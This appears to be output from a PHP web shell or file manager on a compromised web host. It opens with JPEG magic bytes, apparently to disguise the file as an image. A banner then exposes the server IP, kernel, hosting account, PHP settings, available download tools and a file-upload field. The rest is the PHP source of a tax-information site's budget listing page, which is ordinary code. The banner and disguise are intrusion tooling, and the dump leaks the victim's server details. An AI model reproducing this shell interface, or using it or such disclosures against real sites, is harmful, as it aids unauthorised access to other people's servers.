ÿØÿà JPEG ÿþ;
Server IP : 68.65.120.201 / Your IP : 216.73.216.73 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/taxhyuvu/www/ |
Upload File : |
<?php include('head.php'); ?> <title>Annual Budget 2022 to 2025 | Taxhelpline </title> <meta name="description" content="Stay updated with the latest government budget announcements, tax reforms, and expert analysis. TaxHelpline breaks down key budget highlights, impacts, and implications for businesses and individuals."> <meta name="keywords" content="government budget 2025, annual budget analysis, tax reforms, budget highlights, tax changes, finance bill, TaxHelpline, federal budget, tax policy update, economic forecast"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style> .card { border-radius: 10px; border: 1px solid #ffeaea; border-top: 4px solid #0195a1; box-shadow: 0 5px 20px 0 #bbb; background-color: #fff!important; padding: 50px; } .btn-primary { background: #009bad; border: #0a9eb0; color:white;transition:0.5s; } .btn-primary:hover { background: #98a0a4; border: #98a0a4; color:white;transition:0.5s; } @media (min-width: 1400px){ .container, .container-lg, .container-md, .container-sm, .container-xl, .container-xxl { max-width: 90%; }} .sami:hover{ box-shadow:2px 10px 10px #bbbbbb; transition:0.5s; cursor:pointer; border-radius: 10px;} .sami{border: 1px solid #c8c9ca; transition:0.5s; border-radius: 10px;} </style> <!-- Page Header Start --> <!-- <div class="container-fluid page-header wow fadeIn" data-wow-delay="0.1s"> <div class="container"> <h1 class="display-3 mb-3 animated slideInDown">Contact Us</h1> <nav aria-label="breadcrumb animated slideInDown" style=" font-family: math;font-size: 21px; font-weight: bolder;"> <ol class="breadcrumb mb-0"> <li class="breadcrumb-item"><a class="text-body" href="index.php">Home</a></li> <li class="breadcrumb-item"><a class="text-body" href="product.php">Products</a></li> <li class="breadcrumb-item text-dark active" aria-current="page">Contact Us</li> </ol> </nav> </div> </div> --> <!-- Page Header End --> <div class="row"> <div class="col-md-1"> <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6156506060173413" crossorigin="anonymous"></script> <!-- budget 1 --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-6156506060173413" data-ad-slot="1038589856" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> <div class="col-md-10"> <div class="container-fluid" style="margin-bottom:3%;"> <?php $sr=1; $final="SELECT * FROM `budget` WHERE `tp` = '2025-26' "; $finaldata=mysqli_query($con,$final); ?> <div class="card" style="margin-top:3%; margin-bottom:3%;"> <section id="contact" class="contact"> <div class="" data-aos="fade-up"> <div class="row asif"> <div class="col-xl-12 col-lg-12 col-md-12 col-sm-12 boss"> <h1 style="font-weight: bolder;font-family: 'Laila', sans-serif;font-size: 45px; color: #00868f;" class="text-center"><b>Budget 2025-26</b></h1> <table class="table table-bordered" style="margin-top: 35px; "> <thead> <tr style="font-family: 'Lora', serif;font-size: 22px; font-weight:bold; color:#383636;"> <th style="width: 90px;" class="text-center">Sr. No</th> <th class="text-center">Title</th> <th class="text-center">View</th> </tr> </thead> <tbody> <?php foreach ($finaldata as $bud) { ?> <tr style="font-family: 'Lora', serif;font-size: 21px; color:#262525"> <td class="text-center" style="vertical-align:middle;"><?php echo $sr++?></td> <td style="vertical-align:middle;"><?php echo $bud['subject']?></td> <?php if(isset($_SESSION['logedin']) && $_SESSION['logedin']==true) { ?> <td class="text-center" style="width: 130px; vertical-align:middle;" ><a href="admin/budgets/<?php echo $bud['PDF']?>"><button class="btn btn-primary" style="width: 100%; height: 100%; font-family: 'Lora', serif;font-size: 18px; ">View</button></a></td> <?php } else{ ?> <td class="text-center" style="width: 130px; vertical-align:middle;" ><a href="login"> <button class="btn btn-primary" style="width: 100%; height: 100%; font-family: 'Lora', serif;font-size: 18px; ">View</button></a></td> <?php }?> </tr> <?php }?> </tbody> </table> </div> </div> </div> </section><!-- End Contact Section --> </div> <?php $sr=1; $final="SELECT * FROM `budget` WHERE `tp` = '2024-25' "; $finaldata=mysqli_query($con,$final); ?> <div class="card" style="margin-top:3%; margin-bottom:3%;"> <section id="contact" class="contact"> <div class="" data-aos="fade-up"> <div class="row asif"> <div class="col-xl-12 col-lg-12 col-md-12 col-sm-12 boss"> <h1 style="font-weight: bolder;font-family: 'Laila', sans-serif;font-size: 45px; color: #00868f;" class="text-center"><b>Budget 2024-25</b></h1> <table class="table table-bordered" style="margin-top: 35px; "> <thead> <tr style="font-family: 'Lora', serif;font-size: 22px; font-weight:bold; color:#383636;"> <th style="width: 90px;" class="text-center">Sr. No</th> <th class="text-center">Title</th> <th class="text-center">View</th> </tr> </thead> <tbody> <?php foreach ($finaldata as $bud) { ?> <tr style="font-family: 'Lora', serif;font-size: 21px; color:#262525"> <td class="text-center" style="vertical-align:middle;"><?php echo $sr++?></td> <td style="vertical-align:middle;"><?php echo $bud['subject']?></td> <?php if(isset($_SESSION['logedin']) && $_SESSION['logedin']==true) { ?> <td class="text-center" style="width: 130px; vertical-align:middle;" ><a href="admin/budgets/<?php echo $bud['PDF']?>"><button class="btn btn-primary" style="width: 100%; height: 100%; font-family: 'Lora', serif;font-size: 18px; ">View</button></a></td> <?php } else{ ?> <td class="text-center" style="width: 130px; vertical-align:middle;" ><a href="login"> <button class="btn btn-primary" style="width: 100%; height: 100%; font-family: 'Lora', serif;font-size: 18px; ">View</button></a></td> <?php }?> </tr> <?php }?> </tbody> </table> </div> </div> </div> </section><!-- End Contact Section --> </div> <?php $sr=1; $final="SELECT * FROM `budget` WHERE `tp` = '2023-24' "; $finaldata=mysqli_query($con,$final); ?> <div class="card"> <section id="contact" class="contact"> <div class="" data-aos="fade-up"> <div class="row asif"> <div class="col-xl-12 col-lg-12 col-md-12 col-sm-12 boss"> <h1 style="font-weight: bolder;font-family: 'Laila', sans-serif;font-size: 45px; color: #00868f;" class="text-center"><b>Budget 2023-24</b></h1> <table class="table table-bordered" style="margin-top: 35px; "> <thead> <tr style="font-family: 'Lora', serif;font-size: 22px; font-weight:bold; color:#383636;"> <th style="width: 90px;" class="text-center">Sr. No</th> <th class="text-center">Title</th> <th class="text-center">View</th> </tr> </thead> <tbody> <?php foreach ($finaldata as $bud) { ?> <tr style="font-family: 'Lora', serif;font-size: 21px; color:#262525"> <td class="text-center" style="vertical-align:middle;"><?php echo $sr++?></td> <td style="vertical-align:middle;"><?php echo $bud['subject']?></td> <?php if(isset($_SESSION['logedin']) && $_SESSION['logedin']==true) { ?> <td class="text-center" style="width: 130px; vertical-align:middle;" ><a href="admin/budgets/<?php echo $bud['PDF']?>"><button class="btn btn-primary" style="width: 100%; height: 100%; font-family: 'Lora', serif;font-size: 18px; ">View</button></a></td> <?php } else{ ?> <td class="text-center" style="width: 130px; vertical-align:middle;" ><a href="login"> <button class="btn btn-primary" style="width: 100%; height: 100%; font-family: 'Lora', serif;font-size: 18px; ">View</button></a></td> <?php }?> </tr> <?php }?> </tbody> </table> </div> </div> </div> </section><!-- End Contact Section --> </div> <?php $sn=1; $final="SELECT * FROM `budget` WHERE `tp` = '2022-23' "; $finaldata=mysqli_query($con,$final); ?> <div class="card" style="margin-top:50px;"> <section id="contact" class="contact"> <div class="" data-aos="fade-up"> <div class="row asif"> <div class="col-xl-12 col-lg-12 col-md-12 col-sm-12 boss"> <h1 style="font-weight: bolder;font-family: 'Laila', sans-serif;font-size: 45px; color: #00868f;" class="text-center"><b>Budget 2022-23</b></h1> <table class="table table-bordered" style="margin-top: 35px; "> <thead> <tr style="font-family: 'Lora', serif;font-size: 22px; font-weight:bold; color:#383636;"> <th style="width: 90px;" class="text-center">Sr. No</th> <th class="text-center">Title</th> <th class="text-center">View</th> </tr> </thead> <tbody> <?php foreach ($finaldata as $bud2) { ?> <tr style="font-family: 'Lora', serif;font-size: 21px; color:#262525;"> <td class="text-center" style="vertical-align:middle;"><?php echo $sn++?></td> <td style="vertical-align:middle;"><?php echo $bud2['subject']?></td> <?php if(isset($_SESSION['logedin']) && $_SESSION['logedin']==true) { ?> <td class="text-center" style="width: 130px; vertical-align:middle;" ><a href="admin/budgets/<?php echo $bud2['PDF']?>"><button class="btn btn-primary" style="width: 100%; height: 100%; font-family: 'Lora', serif;font-size: 18px; ">View</button></a></td> <?php } else{ ?> <td class="text-center" style="width: 130px; vertical-align:middle;" ><a href="login"> <button class="btn btn-primary" style="width: 100%; height: 100%; font-family: 'Lora', serif;font-size: 18px; ">View</button></a></td> <?php }?> </tr> <?php }?> </tbody> </table> </div> </div> </div> </section><!-- End Contact Section --> </div> </div> </div> <div class="col-md-1"> <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6156506060173413" crossorigin="anonymous"></script> <!-- budget 2 --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-6156506060173413" data-ad-slot="6646139756" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> </div> <!-- <div class="card" style="margin-top:50px;"> <section id="contact" class="contact"> <div class="" data-aos="fade-up"> <div class="row asif"> <div class="col-xl-12 col-lg-12 col-md-12 col-sm-12 boss"> <h1 style="font-weight: bolder;font-family: 'Laila', sans-serif;font-size: 45px; color: #00868f;" class="text-center"><b>Budget 2021-22</b></h1> <table class="table table-bordered" style="margin-top: 35px; "> <thead> <tr style="font-family: 'Lora', serif;font-size: 22px; font-weight:bold; color:#383636;"> <th style="width: 90px;" class="text-center">Sr. No</th> <th class="text-center">Title</th> <th class="text-center">View</th> </tr> </thead> <tbody> <tr style="font-family: 'Lora', serif;font-size: 21px; color:#4c4c4c;"> <td class="text-center" style="vertical-align:middle;">1</td> <td style="vertical-align:middle;">Fifth Schedule To The Customs Act, 1969</td> <td class="text-center" style="width: 130px; vertical-align:middle;" ><button class="btn btn-primary" style="width: 100%; height: 100%; font-family: 'Lora', serif;font-size: 18px; ">View</button></td> </tr> </tbody> </table> </div> </div> </div> </section> </div> --> <!-- <div class="card" style="margin-top:50px;"> <section id="contact" class="contact"> <div class="" data-aos="fade-up"> <div class="row asif"> <div class="col-xl-12 col-lg-12 col-md-12 col-sm-12 boss"> <h1 style="font-weight: bolder;font-family: 'Laila', sans-serif;font-size: 45px; color: #00868f;" class="text-center"><b>Budget 2020-21</b></h1> <table class="table table-bordered" style="margin-top: 35px; "> <thead> <tr style="font-family: 'Lora', serif;font-size: 22px; font-weight:bold; color:#383636;"> <th style="width: 90px;" class="text-center">Sr. No</th> <th class="text-center">Title</th> <th class="text-center">View</th> </tr> </thead> <tbody> <tr style="font-family: 'Lora', serif;font-size: 21px; color:#4c4c4c;"> <td class="text-center" style="vertical-align:middle;">1</td> <td style="vertical-align:middle;">Fifth Schedule To The Customs Act, 1969</td> <td class="text-center" style="width: 130px; vertical-align:middle;" ><button class="btn btn-primary" style="width: 100%; height: 100%; font-family: 'Lora', serif;font-size: 18px; ">View</button></td> </tr> </tbody> </table> </div> </div> </div> </section> </div> --> <!-- <div class="card" style="margin-top:50px;"> <section id="contact" class="contact"> <div class="" data-aos="fade-up"> <div class="row asif"> <div class="col-xl-12 col-lg-12 col-md-12 col-sm-12 boss"> <h1 style="font-weight: bolder;font-family: 'Laila', sans-serif;font-size: 45px; color: #00868f;" class="text-center"><b>Budget 2019-20</b></h1> <table class="table table-bordered" style="margin-top: 35px; "> <thead> <tr style="font-family: 'Lora', serif;font-size: 22px; font-weight:bold; color:#383636;"> <th style="width: 90px;" class="text-center">Sr. No</th> <th class="text-center">Title</th> <th class="text-center">View</th> </tr> </thead> <tbody> <tr style="font-family: 'Lora', serif;font-size: 21px; color:#4c4c4c;"> <td class="text-center" style="vertical-align:middle;">1</td> <td style="vertical-align:middle;">Fifth Schedule To The Customs Act, 1969</td> <td class="text-center" style="width: 130px; vertical-align:middle;" ><button class="btn btn-primary" style="width: 100%; height: 100%; font-family: 'Lora', serif;font-size: 18px; ">View</button></td> </tr> </tbody> </table> </div> </div> </div> </section> </div> --> <!-- Contact End --> <?php include('footer.php'); ?>